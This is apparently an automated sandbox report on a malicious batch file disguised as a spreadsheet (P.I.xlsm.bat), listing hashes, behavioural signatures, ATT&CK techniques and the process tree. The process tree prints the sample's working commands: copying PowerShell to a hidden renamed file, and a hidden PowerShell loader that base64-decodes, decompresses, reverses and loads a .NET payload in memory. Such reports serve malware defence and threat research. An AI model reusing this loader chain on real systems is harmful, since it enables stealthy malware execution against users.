Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 19:58

General

  • Target

    P.I.xlsm.bat

  • Size

    3.0MB

  • MD5

    345fd8e60b26a425db12a3b4f03db858

  • SHA1

    b3815d7d301866fbdd472168dc63d88e3bdb93a6

  • SHA256

    84011035b4c05eefeeb6cb35acffb479b26d1c18c8876f3eb881a222c0ee7d49

  • SHA512

    42bba166fb3b1e12c998522a7e622e8894c0efacacbca5e457be4d0fa0559ccfa614e7e547ad3f49f3688a1e93654416ffe3ea9b07d97fa94513d4b7f61e791e

  • SSDEEP

    49152:uVSpD/97Zd7hGxfTyS+HA02ZDMuDzaKoZ0FsCc:V

Score
8/10

Malware Config

Signatures

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\P.I.xlsm.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:348
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F "
      2⤵
        PID:1780
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\P.I.xlsm.bat.Jda
        2⤵
          PID:3048
        • C:\Windows\system32\attrib.exe
          attrib +s +h C:\Users\Admin\AppData\Local\Temp\P.I.xlsm.bat.Jda
          2⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2552
        • C:\Users\Admin\AppData\Local\Temp\P.I.xlsm.bat.Jda
          C:\Users\Admin\AppData\Local\Temp\P.I.xlsm.bat.Jda -WindowStyle hidden -command "$Tkbbzsbbj = Get-Content 'C:\Users\Admin\AppData\Local\Temp\P.I.xlsm.bat' | select-object -Last 1; $Xnudsar = [System.Convert]::FromBase64String($Tkbbzsbbj);$Ybkhjhtkz = New-Object System.IO.MemoryStream( , $Xnudsar );$Rkkqpm = New-Object System.IO.MemoryStream;$Barkkgph = New-Object System.IO.Compression.GzipStream $Ybkhjhtkz, ([IO.Compression.CompressionMode]::Decompress);$Barkkgph.CopyTo( $Rkkqpm );$Barkkgph.Close();$Ybkhjhtkz.Close();[byte[]] $Xnudsar = $Rkkqpm.ToArray();[Array]::Reverse($Xnudsar); $Dflvww = [System.Threading.Thread]::GetDomain().Load($Xnudsar); $Taxyiyat = $Dflvww.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2404

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Defense Evasion

      Hide Artifacts

      2
      T1564

      Hidden Files and Directories

      2
      T1564.001

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\P.I.xlsm.bat.Jda
        Filesize

        442KB

        MD5

        92f44e405db16ac55d97e3bfe3b132fa

        SHA1

        04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

        SHA256

        6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

        SHA512

        f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

      • memory/2404-5-0x0000000073E41000-0x0000000073E42000-memory.dmp
        Filesize

        4KB

      • memory/2404-6-0x0000000073E40000-0x00000000743EB000-memory.dmp
        Filesize

        5.7MB

      • memory/2404-7-0x0000000073E40000-0x00000000743EB000-memory.dmp
        Filesize

        5.7MB

      • memory/2404-8-0x0000000073E40000-0x00000000743EB000-memory.dmp
        Filesize

        5.7MB

      • memory/2404-9-0x0000000073E40000-0x00000000743EB000-memory.dmp
        Filesize

        5.7MB

      • memory/2404-10-0x0000000073E40000-0x00000000743EB000-memory.dmp
        Filesize

        5.7MB